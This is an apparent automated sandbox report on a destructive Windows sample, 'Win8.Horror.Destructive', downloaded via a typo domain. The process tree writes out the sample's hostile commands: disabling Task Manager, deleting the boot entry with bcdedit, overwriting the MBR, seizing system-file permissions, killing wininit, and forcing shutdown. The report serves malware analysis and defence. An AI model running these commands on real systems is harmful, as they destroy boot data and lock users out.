Analysis

  • max time kernel
    279s
  • max time network
    281s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08-11-2024 15:56

Errors

Reason
Machine shutdown

General

  • Target

    http://goole.com

Malware Config

Signatures

  • Disables Task Manager via registry modification
  • Downloads MZ/PE file
  • Possible privilege escalation attempt 9 IoCs
  • A potential corporate email address has been identified in the URL: currency-file@1
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • Modifies file permissions 1 TTPs 9 IoCs
  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Modifies boot configuration data using bcdedit 1 IoCs
  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 31 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Kills process with taskkill 30 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 1 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 16 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 34 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument http://goole.com
    1⤵
    • Enumerates system info in registry
    • Modifies data under HKEY_USERS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:4728
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffc13cbcc40,0x7ffc13cbcc4c,0x7ffc13cbcc58
      2⤵
        PID:1844
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1576,i,3786688219934932681,16888116291804985542,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1868 /prefetch:2
        2⤵
          PID:1480
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2112,i,3786688219934932681,16888116291804985542,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2172 /prefetch:3
          2⤵
            PID:4448
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2252,i,3786688219934932681,16888116291804985542,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2440 /prefetch:8
            2⤵
              PID:3580
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3044,i,3786688219934932681,16888116291804985542,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3060 /prefetch:1
              2⤵
                PID:1440
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3048,i,3786688219934932681,16888116291804985542,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3092 /prefetch:1
                2⤵
                  PID:968
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4452,i,3786688219934932681,16888116291804985542,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4508 /prefetch:1
                  2⤵
                    PID:1376
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4516,i,3786688219934932681,16888116291804985542,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4612 /prefetch:1
                    2⤵
                      PID:4536
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=4788,i,3786688219934932681,16888116291804985542,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4816 /prefetch:1
                      2⤵
                        PID:3048
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5316,i,3786688219934932681,16888116291804985542,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4312 /prefetch:8
                        2⤵
                          PID:2876
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=5184,i,3786688219934932681,16888116291804985542,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4312 /prefetch:1
                          2⤵
                            PID:4864
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=4656,i,3786688219934932681,16888116291804985542,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4796 /prefetch:1
                            2⤵
                              PID:3080
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=5424,i,3786688219934932681,16888116291804985542,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4872 /prefetch:1
                              2⤵
                                PID:4312
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=4820,i,3786688219934932681,16888116291804985542,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5544 /prefetch:1
                                2⤵
                                  PID:3300
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=5728,i,3786688219934932681,16888116291804985542,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5720 /prefetch:1
                                  2⤵
                                    PID:4208
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5868,i,3786688219934932681,16888116291804985542,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5936 /prefetch:1
                                    2⤵
                                      PID:3680
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6100,i,3786688219934932681,16888116291804985542,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6088 /prefetch:8
                                      2⤵
                                        PID:4720
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6212,i,3786688219934932681,16888116291804985542,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6204 /prefetch:8
                                        2⤵
                                          PID:5060
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --field-trial-handle=5456,i,3786688219934932681,16888116291804985542,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4940 /prefetch:1
                                          2⤵
                                            PID:348
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --field-trial-handle=5804,i,3786688219934932681,16888116291804985542,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5824 /prefetch:1
                                            2⤵
                                              PID:5068
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --field-trial-handle=5872,i,3786688219934932681,16888116291804985542,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5176 /prefetch:1
                                              2⤵
                                                PID:4004
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5900,i,3786688219934932681,16888116291804985542,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3200 /prefetch:8
                                                2⤵
                                                  PID:2144
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5540,i,3786688219934932681,16888116291804985542,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3000 /prefetch:8
                                                  2⤵
                                                    PID:5060
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --field-trial-handle=5776,i,3786688219934932681,16888116291804985542,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4732 /prefetch:1
                                                    2⤵
                                                      PID:4320
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --field-trial-handle=3340,i,3786688219934932681,16888116291804985542,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5928 /prefetch:1
                                                      2⤵
                                                        PID:2368
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=5096,i,3786688219934932681,16888116291804985542,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3856 /prefetch:8
                                                        2⤵
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:5072
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=4748,i,3786688219934932681,16888116291804985542,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4736 /prefetch:8
                                                        2⤵
                                                          PID:3428
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=4672,i,3786688219934932681,16888116291804985542,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6064 /prefetch:8
                                                          2⤵
                                                            PID:4560
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=6164,i,3786688219934932681,16888116291804985542,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3096 /prefetch:8
                                                            2⤵
                                                              PID:1720
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5808,i,3786688219934932681,16888116291804985542,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4576 /prefetch:8
                                                              2⤵
                                                                PID:4012
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5364,i,3786688219934932681,16888116291804985542,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4800 /prefetch:8
                                                                2⤵
                                                                  PID:2804
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4724,i,3786688219934932681,16888116291804985542,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4468 /prefetch:8
                                                                  2⤵
                                                                    PID:324
                                                                  • C:\Users\Admin\Downloads\Win8.Horror.Destructive 1.0.exe
                                                                    "C:\Users\Admin\Downloads\Win8.Horror.Destructive 1.0.exe"
                                                                    2⤵
                                                                    • Checks computer location settings
                                                                    • Executes dropped EXE
                                                                    • System Location Discovery: System Language Discovery
                                                                    • Suspicious use of SetWindowsHookEx
                                                                    PID:2844
                                                                    • C:\Windows\system32\wscript.exe
                                                                      "C:\Windows\sysnative\wscript.exe" C:\Users\Admin\AppData\Local\Temp\ED5F.tmp\ED60.tmp\ED61.vbs //Nologo
                                                                      3⤵
                                                                      • Checks computer location settings
                                                                      PID:5072
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ED5F.tmp\Horror8.bat" "
                                                                        4⤵
                                                                        • Checks computer location settings
                                                                        • Modifies registry class
                                                                        PID:2900
                                                                        • C:\Windows\system32\reg.exe
                                                                          reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                                                          5⤵
                                                                          • Modifies registry key
                                                                          PID:3328
                                                                        • C:\Windows\system32\bcdedit.exe
                                                                          bcdedit /delete {current}
                                                                          5⤵
                                                                          • Modifies boot configuration data using bcdedit
                                                                          PID:3148
                                                                        • C:\Users\Admin\AppData\Local\Temp\ED5F.tmp\TrashMBR.exe
                                                                          TrashMBR.exe
                                                                          5⤵
                                                                          • Executes dropped EXE
                                                                          • Writes to the Master Boot Record (MBR)
                                                                          • System Location Discovery: System Language Discovery
                                                                          PID:2320
                                                                        • C:\Windows\system32\taskkill.exe
                                                                          taskkill /f /im taskmgr.exe
                                                                          5⤵
                                                                          • Kills process with taskkill
                                                                          PID:208
                                                                        • C:\Windows\system32\takeown.exe
                                                                          takeown /f C:\Windows\system32\taskmgr.exe
                                                                          5⤵
                                                                          • Possible privilege escalation attempt
                                                                          • Modifies file permissions
                                                                          PID:2756
                                                                        • C:\Windows\system32\icacls.exe
                                                                          icacls C:\Windows\system32\taskmgr.exe /grant Admin:F
                                                                          5⤵
                                                                          • Possible privilege escalation attempt
                                                                          • Modifies file permissions
                                                                          PID:1840
                                                                        • C:\Windows\system32\icacls.exe
                                                                          icacls C:\Windows\system32\taskmgr.exe /grant "everyone":F
                                                                          5⤵
                                                                          • Possible privilege escalation attempt
                                                                          • Modifies file permissions
                                                                          PID:4000
                                                                        • C:\Windows\system32\taskkill.exe
                                                                          taskkill /f /im logonui.exe
                                                                          5⤵
                                                                          • Kills process with taskkill
                                                                          PID:4456
                                                                        • C:\Windows\system32\takeown.exe
                                                                          takeown /f C:\Windows\system32\logonui.exe
                                                                          5⤵
                                                                          • Possible privilege escalation attempt
                                                                          • Modifies file permissions
                                                                          PID:4300
                                                                        • C:\Windows\system32\icacls.exe
                                                                          icacls C:\Windows\system32\logonui.exe /grant Admin:F
                                                                          5⤵
                                                                          • Possible privilege escalation attempt
                                                                          • Modifies file permissions
                                                                          PID:2980
                                                                        • C:\Windows\system32\icacls.exe
                                                                          icacls C:\Windows\system32\logonui.exe /grant "everyone":F
                                                                          5⤵
                                                                          • Possible privilege escalation attempt
                                                                          • Modifies file permissions
                                                                          PID:3736
                                                                        • C:\Windows\system32\taskkill.exe
                                                                          taskkill /f /im explorer.exe
                                                                          5⤵
                                                                          • Kills process with taskkill
                                                                          PID:184
                                                                        • C:\Windows\system32\takeown.exe
                                                                          takeown /f C:\Windows\explorer.exe
                                                                          5⤵
                                                                          • Possible privilege escalation attempt
                                                                          • Modifies file permissions
                                                                          PID:3632
                                                                        • C:\Windows\system32\icacls.exe
                                                                          icacls C:\Windows\explorer.exe /grant Admin:F
                                                                          5⤵
                                                                          • Possible privilege escalation attempt
                                                                          • Modifies file permissions
                                                                          PID:4140
                                                                        • C:\Windows\system32\icacls.exe
                                                                          icacls C:\Windows\explorer.exe /grant "everyone":F
                                                                          5⤵
                                                                          • Possible privilege escalation attempt
                                                                          • Modifies file permissions
                                                                          PID:4872
                                                                        • C:\Windows\System32\WScript.exe
                                                                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ED5F.tmp\music.vbs"
                                                                          5⤵
                                                                          • Enumerates connected drives
                                                                          PID:1888
                                                                        • C:\Users\Admin\AppData\Local\Temp\ED5F.tmp\HorrorGui.exe
                                                                          HorrorGui.exe
                                                                          5⤵
                                                                          • Executes dropped EXE
                                                                          • System Location Discovery: System Language Discovery
                                                                          • Suspicious use of SetWindowsHookEx
                                                                          PID:4124
                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                            taskkill /f /im wininit.exe
                                                                            6⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            • Kills process with taskkill
                                                                            PID:4496
                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                            taskkill /f /im wininit.exe
                                                                            6⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            • Kills process with taskkill
                                                                            PID:4388
                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                            taskkill /f /im wininit.exe
                                                                            6⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            • Kills process with taskkill
                                                                            PID:2460
                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                            taskkill /f /im wininit.exe
                                                                            6⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            • Kills process with taskkill
                                                                            PID:1940
                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                            taskkill /f /im wininit.exe
                                                                            6⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            • Kills process with taskkill
                                                                            PID:2708
                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                            taskkill /f /im wininit.exe
                                                                            6⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            • Kills process with taskkill
                                                                            PID:2276
                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                            taskkill /f /im wininit.exe
                                                                            6⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            • Kills process with taskkill
                                                                            PID:3736
                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                            taskkill /f /im wininit.exe
                                                                            6⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            • Kills process with taskkill
                                                                            PID:2184
                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                            taskkill /f /im wininit.exe
                                                                            6⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            • Kills process with taskkill
                                                                            PID:4172
                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                            taskkill /f /im wininit.exe
                                                                            6⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            • Kills process with taskkill
                                                                            PID:2984
                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                            taskkill /f /im wininit.exe
                                                                            6⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            • Kills process with taskkill
                                                                            PID:3672
                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                            taskkill /f /im wininit.exe
                                                                            6⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            • Kills process with taskkill
                                                                            PID:2612
                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                            taskkill /f /im wininit.exe
                                                                            6⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            • Kills process with taskkill
                                                                            PID:1748
                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                            taskkill /f /im wininit.exe
                                                                            6⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            • Kills process with taskkill
                                                                            PID:3156
                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                            taskkill /f /im wininit.exe
                                                                            6⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            • Kills process with taskkill
                                                                            PID:3412
                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                            taskkill /f /im wininit.exe
                                                                            6⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            • Kills process with taskkill
                                                                            PID:1848
                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                            taskkill /f /im wininit.exe
                                                                            6⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            • Kills process with taskkill
                                                                            PID:3704
                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                            taskkill /f /im wininit.exe
                                                                            6⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            • Kills process with taskkill
                                                                            PID:3656
                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                            taskkill /f /im wininit.exe
                                                                            6⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            • Kills process with taskkill
                                                                            PID:3440
                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                            taskkill /f /im wininit.exe
                                                                            6⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            • Kills process with taskkill
                                                                            PID:3328
                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                            taskkill /f /im wininit.exe
                                                                            6⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            • Kills process with taskkill
                                                                            PID:2996
                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                            taskkill /f /im wininit.exe
                                                                            6⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            • Kills process with taskkill
                                                                            PID:4956
                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                            taskkill /f /im wininit.exe
                                                                            6⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            • Kills process with taskkill
                                                                            PID:4456
                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                            taskkill /f /im wininit.exe
                                                                            6⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            • Kills process with taskkill
                                                                            PID:2864
                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                            taskkill /f /im wininit.exe
                                                                            6⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            • Kills process with taskkill
                                                                            PID:3612
                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                            taskkill /f /im wininit.exe
                                                                            6⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            • Kills process with taskkill
                                                                            PID:3392
                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                            taskkill /f /im wininit.exe
                                                                            6⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            • Kills process with taskkill
                                                                            PID:3924
                                                                          • C:\Windows\SysWOW64\Shutdown.exe
                                                                            Shutdown /s /t 00
                                                                            6⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:3944
                                                                • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                                                                  "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                                                                  1⤵
                                                                    PID:4340
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                                                    1⤵
                                                                      PID:2184
                                                                    • C:\Windows\system32\AUDIODG.EXE
                                                                      C:\Windows\system32\AUDIODG.EXE 0x2ec 0x498
                                                                      1⤵
                                                                        PID:4464

                                                                      Network

                                                                      MITRE ATT&CK Enterprise v15

                                                                      Replay Monitor

                                                                      Loading Replay Monitor...

                                                                      Downloads

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

                                                                        Filesize

                                                                        649B

                                                                        MD5

                                                                        aac5f1315a5dff0df6a02dc9dfd69d33

                                                                        SHA1

                                                                        4d9af745f1ba8b2498d7136a65b900712051be84

                                                                        SHA256

                                                                        fd02ffa39686130ec9f55ad5693674a95fbbb2f664c95079e9f30f986742660f

                                                                        SHA512

                                                                        4d9795c12f1844b6b91cf3b9ad9a3b9538f7af06b91406f827f48579e1030a12b5298f35c1eeaa9d2b8e27b6ee775d2332b9028be773b9f61c6627855b4e194f

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00002d

                                                                        Filesize

                                                                        215KB

                                                                        MD5

                                                                        e579aca9a74ae76669750d8879e16bf3

                                                                        SHA1

                                                                        0b8f462b46ec2b2dbaa728bea79d611411bae752

                                                                        SHA256

                                                                        6e51c7866705bf0098febfaf05cf4652f96e69ac806c837bfb1199b6e21e6aaf

                                                                        SHA512

                                                                        df22f1dff74631bc14433499d1f61609de71e425410067fd08ec193d100b70d98672228906081c309a06bcba03c097ace885240a3ce71e0da4fdb8a022fc9640

